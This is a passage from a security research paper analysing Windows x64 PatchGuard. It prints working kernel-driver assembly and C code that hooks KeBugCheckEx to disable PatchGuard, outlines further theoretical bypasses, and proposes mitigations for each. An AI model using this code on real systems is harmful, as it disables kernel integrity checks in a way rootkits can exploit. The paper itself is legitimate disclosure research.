routine can be called. However, if it is 0x109, then the thread can be
|
|
restarted by restoring the calling thread's stack pointer to its stack
|
|
limit minus 8 and then jumping to the thread's StartAddress. The end
|
|
result is that the thread goes back to processing work items and
|
|
expiring DPC routines like normal.
|
|
|
|
While a more obvious approach would be to simply terminate the calling
|
|
thread, doing so would not be possible. The operating system keeps
|
|
track of system worker threads and will detect if one exits. The act of
|
|
a system worker thread exiting will lead to a bluescreen of the system
|
|
-- exactly the type of thing that is trying to be avoided.
|
|
|
|
The following code implements the algorithm described above. It is
|
|
fairly large for reasons that will be discussed after the snippet:
|
|
|
|
|
|
== ext.asm
|
|
|
|
.data
|
|
|
|
EXTERN OrigKeBugCheckExRestorePointer:PROC
|
|
EXTERN KeBugCheckExHookPointer:PROC
|
|
|
|
.code
|
|
|
|
;
|
|
; Points the stack pointer at the supplied argument and returns to the caller.
|
|
;
|
|
public AdjustStackCallPointer
|
|
AdjustStackCallPointer PROC
|
|
mov rsp, rcx
|
|
xchg r8, rcx
|
|
jmp rdx
|
|
AdjustStackCallPointer ENDP
|
|
|
|
;
|
|
; Wraps the overwritten preamble of KeBugCheckEx.
|
|
;
|
|
public OrigKeBugCheckEx
|
|
OrigKeBugCheckEx PROC
|
|
mov [rsp+8h], rcx
|
|
mov [rsp+10h], rdx
|
|
mov [rsp+18h], r8
|
|
lea rax, [OrigKeBugCheckExRestorePointer]
|
|
jmp qword ptr [rax]
|
|
OrigKeBugCheckEx ENDP
|
|
|
|
END
|
|
|
|
== antipatch.c
|
|
|
|
//
|
|
// Both of these routines reference the assembly code described
|
|
// above
|
|
//
|
|
extern VOID OrigKeBugCheckEx(
|
|
IN ULONG BugCheckCode,
|
|
IN ULONG_PTR BugCheckParameter1,
|
|
IN ULONG_PTR BugCheckParameter2,
|
|
IN ULONG_PTR BugCheckParameter3,
|
|
IN ULONG_PTR BugCheckParameter4);
|
|
extern VOID AdjustStackCallPointer(
|
|
IN ULONG_PTR NewStackPointer,
|
|
IN PVOID StartAddress,
|
|
IN PVOID Argument);
|
|
|
|
//
|
|
// mov eax, ptr
|
|
// jmp eax
|
|
//
|
|
static CHAR HookStub[] =
|
|
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xe0";
|
|
|
|
//
|
|
// The offset into the ETHREAD structure that holds the start routine.
|
|
//
|
|
static ULONG ThreadStartRoutineOffset = 0;
|
|
|
|
//
|
|
// The pointer into KeBugCheckEx after what has been overwritten by the hook.
|
|
//
|
|
PVOID OrigKeBugCheckExRestorePointer;
|
|
|
|
VOID KeBugCheckExHook(
|
|
IN ULONG BugCheckCode,
|
|
IN ULONG_PTR BugCheckParameter1,
|
|
IN ULONG_PTR BugCheckParameter2,
|
|
IN ULONG_PTR BugCheckParameter3,
|
|
IN ULONG_PTR BugCheckParameter4)
|
|
{
|
|
PUCHAR LockedAddress;
|
|
PCHAR ReturnAddress;
|
|
PMDL Mdl = NULL;
|
|
|
|
|
|
//
|
|
// Call the real KeBugCheckEx if this isn't the bug check code we're looking
|
|
// for.
|
|
//
|
|
if (BugCheckCode != 0x109)
|
|
{
|
|
DebugPrint(("Passing through bug check %.4x to %p.",
|
|
BugCheckCode,
|
|
OrigKeBugCheckEx));
|
|
|
|
OrigKeBugCheckEx(
|
|
BugCheckCode,
|
|
BugCheckParameter1,
|
|
BugCheckParameter2,
|
|
BugCheckParameter3,
|
|
BugCheckParameter4);
|
|
}
|
|
else
|
|
{
|
|
PCHAR CurrentThread = (PCHAR)PsGetCurrentThread();
|
|
PVOID StartRoutine = *(PVOID **)(CurrentThread + ThreadStartRoutineOffset);
|
|
PVOID StackPointer = IoGetInitialStack();
|
|
|
|
DebugPrint(("Restarting the current worker thread %p at %p (SP=%p, off=%lu).",
|
|
PsGetCurrentThread(),
|
|
StartRoutine,
|
|
StackPointer,
|
|
ThreadStartRoutineOffset));
|
|
|
|
//
|
|
// Shift the stack pointer back to its initial value and call the routine. We
|
|
// subtract eight to ensure that the stack is aligned properly as thread
|
|
// entry point routines would expect.
|
|
//
|
|
AdjustStackCallPointer(
|
|
(ULONG_PTR)StackPointer - 0x8,
|
|
StartRoutine,
|
|
NULL);
|
|
}
|
|
|
|
//
|
|
// In either case, we should never get here.
|
|
//
|
|
__debugbreak();
|
|
}
|
|
|
|
VOID DisablePatchProtectionSystemThreadRoutine(
|
|
IN PVOID Nothing)
|
|
{
|
|
UNICODE_STRING SymbolName;
|
|
NTSTATUS Status = STATUS_SUCCESS;
|
|
PUCHAR LockedAddress;
|
|
PUCHAR CurrentThread = (PUCHAR)PsGetCurrentThread();
|
|
PCHAR KeBugCheckExSymbol;
|
|
PMDL Mdl = NULL;
|
|
|
|
|
|
RtlInitUnicodeString(
|
|
&SymbolName,
|
|
L"KeBugCheckEx");
|
|
|
|
do
|
|
{
|
|
//
|
|
// Find the thread's start routine offset.
|
|
//
|
|
for (ThreadStartRoutineOffset = 0;
|
|
ThreadStartRoutineOffset < 0x1000;
|
|
ThreadStartRoutineOffset += 4)
|
|
{
|
|
if (*(PVOID **)(CurrentThread +
|
|
ThreadStartRoutineOffset) == (PVOID)DisablePatchProtection2SystemThreadRoutine)
|
|
break;
|
|
}
|
|
|
|
DebugPrint(("Thread start routine offset is 0x%.4x.",
|
|
ThreadStartRoutineOffset));
|
|
|
|
//
|
|
// If we failed to find the start routine offset for some strange reason,
|
|
// then return not supported.
|
|
//
|
|
if (ThreadStartRoutineOffset >= 0x1000)
|
|
{
|
|
Status = STATUS_NOT_SUPPORTED;
|
|
break;
|
|
}
|
|
|
|
//
|
|
// Get the address of KeBugCheckEx.
|
|
//
|
|
if (!(KeBugCheckExSymbol = MmGetSystemRoutineAddress(
|
|
&SymbolName)))
|
|
{
|
|
Status = STATUS_PROCEDURE_NOT_FOUND;
|
|
break;
|
|
}
|
|
|
|
//
|
|
// Calculate the restoration pointer.
|
|
//
|
|
OrigKeBugCheckExRestorePointer = (PVOID)(KeBugCheckExSymbol + 0xf);
|
|
|
|
//
|
|
// Create an initialize the MDL.
|
|
//
|
|
if (!(Mdl = MmCreateMdl(
|
|
NULL,
|
|
(PVOID)KeBugCheckExSymbol,
|
|
0xf)))
|
|
{
|
|
Status = STATUS_INSUFFICIENT_RESOURCES;
|
|
break;
|
|
}
|
|
|
|
MmBuildMdlForNonPagedPool(
|
|
Mdl);
|
|
|
|
//
|
|
// Probe & Lock.
|
|
//
|
|
if (!(LockedAddress = (PUCHAR)MmMapLockedPages(
|
|
Mdl,
|
|
KernelMode)))
|
|
{
|
|
IoFreeMdl(
|
|
Mdl);
|
|
|
|
Status = STATUS_ACCESS_VIOLATION;
|
|
break;
|
|
}
|
|
|
|
//
|
|
// Set the aboslute address to our hook.
|
|
//
|
|
*(PULONG64)(HookStub + 0x2) = (ULONG64)KeBugCheckExHook;
|
|
|
|
DebugPrint(("Copying hook stub to %p from %p (Symbol %p).",
|
|
LockedAddress,
|
|
HookStub,
|
|
KeBugCheckExSymbol));
|
|
|
|
//
|
|
// Copy the relative jmp into the hook routine.
|
|
//
|
|
RtlCopyMemory(
|
|
LockedAddress,
|
|
HookStub,
|
|
0xf);
|
|
|
|
//
|
|
// Cleanup the MDL.
|
|
//
|
|
MmUnmapLockedPages(
|
|
LockedAddress,
|
|
Mdl);
|
|
|
|
IoFreeMdl(
|
|
Mdl);
|
|
|
|
} while (0);
|
|
}
|
|
|
|
//
|
|
// A pointer to KeBugCheckExHook
|
|
//
|
|
PVOID KeBugCheckExHookPointer = KeBugCheckExHook;
|
|
|
|
NTSTATUS DisablePatchProtection() {
|
|
OBJECT_ATTRIBUTES Attributes;
|
|
NTSTATUS Status;
|
|
HANDLE ThreadHandle = NULL;
|
|
|
|
InitializeObjectAttributes(
|
|
&Attributes,
|
|
NULL,
|
|
OBJ_KERNEL_HANDLE,
|
|
NULL,
|
|
NULL);
|
|
|
|
//
|
|
// Create the system worker thread so that we can automatically find the
|
|
// offset inside the ETHREAD structure to the thread's start routine.
|
|
//
|
|
Status = PsCreateSystemThread(
|
|
&ThreadHandle,
|
|
THREAD_ALL_ACCESS,
|
|
&Attributes,
|
|
NULL,
|
|
NULL,
|
|
DisablePatchProtectionSystemThreadRoutine,
|
|
NULL);
|
|
|
|
if (ThreadHandle)
|
|
ZwClose(
|
|
ThreadHandle);
|
|
|
|
return Status;
|
|
}
|
|
|
|
|
|
This approach has been tested and has been confirmed to work against
|
|
the current version of PatchGuard at the time of this writing. The
|
|
benefits that this approach has over others is that it does not rely
|
|
on any un-exported dependencies or signatures, it has zero
|
|
performance overhead since nt!KeBugCheckEx is never called
|
|
unless the machine is going to crash, and it is not subject to race
|
|
conditions. The only major con that it has that the authors are
|
|
aware of is that it depends on the behavior of the system worker
|
|
threads staying the same with regard to the fact that it is safe to
|
|
restore execution to the entry point of the thread with a
|
|
NULL context. It is assumed, so far, that this will
|
|
continue to be a safe bet.
|
|
|
|
In order to eliminate this approach as a possible bypass technique,
|
|
Microsoft could do one of a few things. First, they could create a new
|
|
protection sub-context that stores a checksum of nt!KeBugCheckEx and the
|
|
functions that it calls. In the event that it is detected that
|
|
nt!KeBugCheckEx has been tampered with, PatchGuard could do a hard
|
|
reboot without calling any external functions. While this is a less
|
|
desired behavior, it appears to be one of the few ways in which
|
|
Microsoft could reliably solve this. Any other approach that relied on
|
|
the calling of an external function that could be found at a
|
|
deterministic address would present an opportunity for a similar bypass
|
|
technique.
|
|
|
|
A second, less useful approach would be to zero out some of the fields
|
|
in the thread structure prior to calling nt!KeBugCheckEx. While this
|
|
would prevent the above described approach from working, it would
|
|
certainly not prevent another, perhaps more or less hackish approach
|
|
from working. All that's required is the ability to return the worker
|
|
thread to its normal operation of processing queued work items.
|
|
|
|
4.3) Finding the Timer
|
|
|
|
|
|
A theoretical approach that has not been tested that could be used to
|
|
disable PatchGuard would involve using some heuristic algorithm to
|
|
locate the timer context associated with PatchGuard. To develop such an
|
|
algorithm, it is necessary to take into account what is known about the
|
|
way the timer DPC routine is set up. First, it is known that the
|
|
DeferredRoutine associated with the DPC will point to one of
|
|
nt!KiScanReadyQueues, nt!ExpTimeRefreshDpcRoutine, or
|
|
nt!ExpTimeZoneDpcRoutine. Unfortunately, the addresses associated with
|
|
these routines cannot be directly determined since they are not
|
|
exported, but regardless, this knowledge could be of use. The second
|
|
thing that is known is that the DeferredContext associated with the DPC
|
|
will be set to an invalid pointer. It is also known that at offset 0x88
|
|
from the start of the timer structure is the word 0x1131. Given
|
|
sufficient research, it is also likely that other contextual references
|
|
could be found in relation to the timer that would provide enough data
|
|
to deterministically identify the PatchGuard timer.
|
|
|
|
However, the problem is finding a way able to enumerate timers in the
|
|
first place. In this case, the un-exported address of the timer list
|
|
would have to be extracted in order to be able to enumerate all of the
|
|
active timers. While there are some indirect methods through which this
|
|
information could be extracted, such as by disassembling some functions
|
|
that make reference to it, the mere fact of depending on some method of
|
|
locating un-exported symbols is something that will likely lead to
|
|
unstable code.
|
|
|
|
Another option that would not require the location of un-exported
|
|
symbols would be to find some mechanism by which the address space can
|
|
be searched, starting at nt!MmNonPagedPoolStart, using the heuristic
|
|
matching requirements described above. Given the right set of
|
|
parameters for the search, it seems likely that it would be possible to
|
|
reliably and deterministically locate the timer structure. However,
|
|
there is certainly a race condition waiting to happen under this model
|
|
given that the timer routine could be dispatched immediately after
|
|
locating it but prior to canceling it. To surmount this, the thread
|
|
doing the searching would need to raise to a higher IRQL and possibly
|
|
disable other processors during the time that it is doing its search.
|
|
|
|
Regardless, given the ability to locate the timer structure, it should
|
|
be as simple as calling nt!KeCancelTimer to abort the PatchGuard
|
|
verification routine and disable it entirely. If possible, such an
|
|
approach would be very optimal because it would require no patching of
|
|
code.
|
|
|
|
If such a technique were to be proven feasible, Microsoft would have to
|
|
do one of two things to break it. First, they could identify the
|
|
matching criteria being used by drivers and ensure that the assumptions
|
|
made are no longer safe, thus making it impossible to locate the timer
|
|
structure using the existing set of matching parameters. Alternatively,
|
|
Microsoft could change the mechanism by which the PatchGuard
|
|
verification routine is executed such that it does not make use of a
|
|
timer DPC routine. The latter is most likely less preferable than the
|
|
former as it would require a relatively significant redesign and
|
|
reconsideration of the techniques used to misdirect and obfuscate the
|
|
PatchGuard verification phase.
|
|
|
|
4.4) Hybrid Interception
|
|
|
|
|
|
Of the techniques listed so far, the approaches taken to disable or
|
|
otherwise prevent PatchGuard from operating as normal rely on two basic
|
|
points of interception. In the case of the exception handler hooking
|
|
approach, PatchGuard is subverted by preventing the actual verification
|
|
routines from running. This point of interception can be seen as a
|
|
before-the-fact approach. In the case of the nt!KeBugCheckEx hook,
|
|
PatchGuard is subverted by preventing the reporting of the error that is
|
|
associated with a critical structure modification being detected. This
|
|
point of interception can be seen as an after-the-fact approach. A
|
|
theoretical approach would be to combine the two concepts in a way that
|
|
allows for more deterministic and complete detection of the execution of
|
|
PatchGuard's verification routines.
|
|
|
|
One possible example of this type of approach would be to generalize the
|
|
hooking of the exception handlers that are associated with the timer DPC
|
|
routines that PatchGuard uses to the central entry point for C-style
|
|
exceptions. This routine is named nt!__C_specific_handler and it is an
|
|
exported symbol, making it quite useful if it can be harnessed. By
|
|
hooking this routine, information about exceptions could be tracked and
|
|
filtered for referencing after-the-fact information, as necessary, to
|
|
determine that PatchGuard is running.
|
|
|
|
4.5) Simulated Hot Patching
|
|
|
|
|
|
The documentation associated with PatchGuard states that it still allows
|
|
the operating system to be hot-patched through their runtime patching
|
|
API. For this reason, it should be possible to simulate a hot-patch
|
|
that would appear to PatchGuard as having been legitimate. At the time
|
|
of this writing, the authors have not taken the time to understand the
|
|
manner in which this could be accomplished, but it is left open to
|
|
further research. Assuming an approach was found that allowed this
|
|
technique to work reliably, it stands to reason that doing so would be
|
|
the most preferred route because it would be making use of a documented
|
|
approach for the circumvention of PatchGuard.
|
|
|
|
5) Conclusion
|
|
|
|
|
|
The development of a solution that is intended to mitigate the
|
|
unauthorized modification of various critical portions of the kernel can
|
|
be seen as a rather daunting task, especially when considering the need
|
|
to ensure that the routines actually used for the validation of the
|
|
kernel cannot be tampered with. This document has shown how Microsoft
|
|
has approached the problem with their PatchGuard implementation on
|
|
x64-based versions of the Windows kernel. The implementations of the
|
|
approaches used to protect the various critical data structures
|
|
associated with the kernel, such as system images, SSDT, IDT/GDT, and
|
|
MSRs, have been explained in detail.
|
|
|
|
With an understanding of the implementation of PatchGuard, it is only
|
|
fitting to consider ways it which it might be subverted. In that light,
|
|
this paper has proposed a few different techniques that could be used to
|
|
bypass PatchGuard that have either been proven to work or are theorized
|
|
to work. In the interest of not identifying a problem without also
|
|
proposing a solution, each bypass technique has an associated list of
|
|
ways in which the technique could be mitigated by Microsoft in the
|
|
future.
|
|
|
|
Unfortunately, Microsoft is at a disadvantage with PatchGuard, and it's
|
|
one that they are perfectly aware of. This disadvantage stems from the
|
|
fact that PatchGuard is designed to run from the same protection domain
|
|
as the code that it is designed to protect from. In more concise terms,
|
|
PatchGuard runs just like any third-party driver, and it runs with the
|
|
same set of privileges. Due to this fact, it is impossible to guarantee
|
|
that a third-party driver won't be able to do something that will
|
|
prevent PatchGuard from being able to do its job since there is no way
|
|
for PatchGuard to completely protect itself. Since this problem was
|
|
known going into the implementation of PatchGuard, Microsoft chose to
|
|
use the only weapons readily available to them: obfuscation and
|
|
misdirection. While most consider security through obscurity to be no
|
|
security at all in the face of a sufficiently motivated engineer, it
|
|
does indeed raise the bar enough that most programmers and third-party
|
|
entities would not have the interest in finding a way to bypass it and
|
|
instead would be more motivated to find a condoned method of
|
|
accomplishing their goals.
|
|
|
|
In cases such as this one it is sometimes important to take a step back
|
|
and consider if the avenue that has been taken is actually the right
|
|
one. In particular, Microsoft has decided to take an aggressive stance
|
|
against patching different parts of the kernel in the interest of making
|
|
Windows more stable. While this desire seems very reasonable and
|
|
logical, it comes at a certain cost. Due to the fact that Windows is a
|
|
closed source operating system, third-party software vendors sometimes
|
|
find themselves forced to bend the rules in order to accomplish the
|
|
goals of their product. This is especially true in the security industry
|
|
where security software vendors find themselves having to try to layer
|
|
deeper than malicious code. It could be argued that PatchGuard's
|
|
implementation will prevent the malicious techniques from being
|
|
possible, thus freeing up the security software vendors to more
|
|
reasonable points of entry. The fact of the matter is, though, that
|
|
while security software vendors may not make use of techniques used to
|
|
bypass PatchGuard due to marketing and security concerns, it can
|
|
certainly be said that malicious code will. As such, malicious code
|
|
actually gains an upper-hand in the competition since security vendors
|
|
end up with their hands tied behind their back. In order to address
|
|
this concern, Microsoft appears to be willing to work actively with
|
|
vendors to ensure that they are still able to accomplish their goals
|
|
through more acceptable and documented approaches.
|
|
|
|
Another important question to consider is whether or not Microsoft will
|
|
really break a vendor that has deployed a solution to millions of
|
|
systems that happens to disable PatchGuard through a bypass technique.
|
|
One could feasibly see a McAfee or Symantec doing something like this,
|
|
although Microsoft would hope to leverage their business ties to ensure
|
|
that McAfee and Symantec did not have to resort to such a technique.
|
|
The fact that McAfee and Symantec are such large companies lends them a
|
|
certain amount of leverage when negotiating with Microsoft, but the
|
|
smaller companies are most likely going to not be subject to the same
|
|
level of respect and consideration.
|
|
|
|
The question remains, though. Is PatchGuard really the right approach?
|
|
If one assumes that Microsoft will aggressively ensure that PatchGuard
|
|
breaks malicious code and software vendors who attempt to bypass it by
|
|
releasing updates in the future that intentionally break the bypass
|
|
approaches, which is what has been indicated so far, then it stands to
|
|
reason that Microsoft could be heading down a path that leads to the
|
|
kernel actually being more unstable due to more extreme measures being
|
|
required. Even if Microsoft extends its hand to other companies to
|
|
provide ways of hooking into the kernel at various levels, it will most
|
|
likely always be the case that there will be a task that a company needs
|
|
to accomplish that will not be readily possible without intervention
|
|
from Microsoft. Unless Microsoft is willing to provide these companies
|
|
with re-distributable code that makes it so third-party drivers will
|
|
work on all existing versions of x64, then the point becomes moot.
|
|
Compatibility is a key requirement not only for Microsoft, but also for
|
|
third-party vendors, and a solution that won't work on all versions of
|
|
the x64 kernel is no solution at all for most companies.
|
|
|
|
If Microsoft were to go back in time and eliminate PatchGuard, what
|
|
other options might be exposed to them that could be used to supplement
|
|
the problem at hand? The answer to this question is very subjective,
|
|
but the authors believe that one way in which Microsoft could solve
|
|
this, at least in part, would be through a better defined and condoned
|
|
hooking model (like hooking VxD services in Windows 9x). The majority
|
|
of routines hooked by legitimate products are used by vendors to layer
|
|
between certain major subsystems, such as between the hardware and the
|
|
kernel or between user-mode and the kernel. Since the majority of
|
|
stability problems that third-party vendors introduce with runtime
|
|
patching have to do with incorrect or unsafe assumptions within their
|
|
hook routines, it would behoove Microsoft to provide a defined hooking
|
|
model that expressed the limitations and restrictions associated with
|
|
each function that can be hooked. While this might seem like a grand
|
|
undertaking, the fact of the matter is that it's not.
|
|
|
|
By limiting the hooking model to exported routines, Microsoft could make
|
|
use of existing documentation that defines the behaviors and limitations
|
|
of the documented functions, such as their IRQL and calling
|
|
restrictions. While limiting the hooking model to exported functions
|
|
does not cover everything, it's at least a start, and the concepts used
|
|
to achieve it could be wrapped into an equally useful interface for
|
|
commonly undocumented or non-exported routines. The biggest problem with
|
|
this approach, however, is that it would appear to limit Microsoft's
|
|
control over the direction that the kernel takes, and in some ways it
|
|
does. However, it should already be safe to assume that exported
|
|
symbols, at least in relation to documented ones, cannot be eliminated
|
|
or largely changed after a release as to ensure backward compatibility.
|
|
This only serves to bolster the point that a defined hooking model for
|
|
documented, exported routines would not only be feasible but also
|
|
relatively safe.
|
|
|
|
Regardless of what may or may not have been a better approach,
|
|
the lack of a time machine makes the end result of the discussion mostly
|
|
meaningless. In the end, judging from the amount of work and thought
|
|
put into the implementation of PatchGuard, the authors feel comfortable
|
|
in saying that Microsoft has done a commendable job. Only time will
|
|
tell how effective PatchGuard is, both at a software and business level,
|
|
and it will be interesting to see how the field plays out.
|
|
|
|
|
|
AMD. The AMD x86-64 Architecture Programmers Overview.
|
|
http://www.amd.com/us-en/assets/contenttype/whitepapersandtechdocs/x86-64overview.pdf;
|
|
accessed Nov 30, 2005.
|
|
|
|
|
|
AMD. AMD64 Architecture Programmer's Manual Volume 3.
|
|
http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24594.pdf;
|
|
accessed Dec 1, 2005.
|
|
|
|
|
|
Microsoft Corporation. Patching Policy for x64-Based Systems.
|
|
http://www.microsoft.com/whdc/driver/kernel/64bitPatching.mspx;
|
|
accessed Nov 28, 2005.
|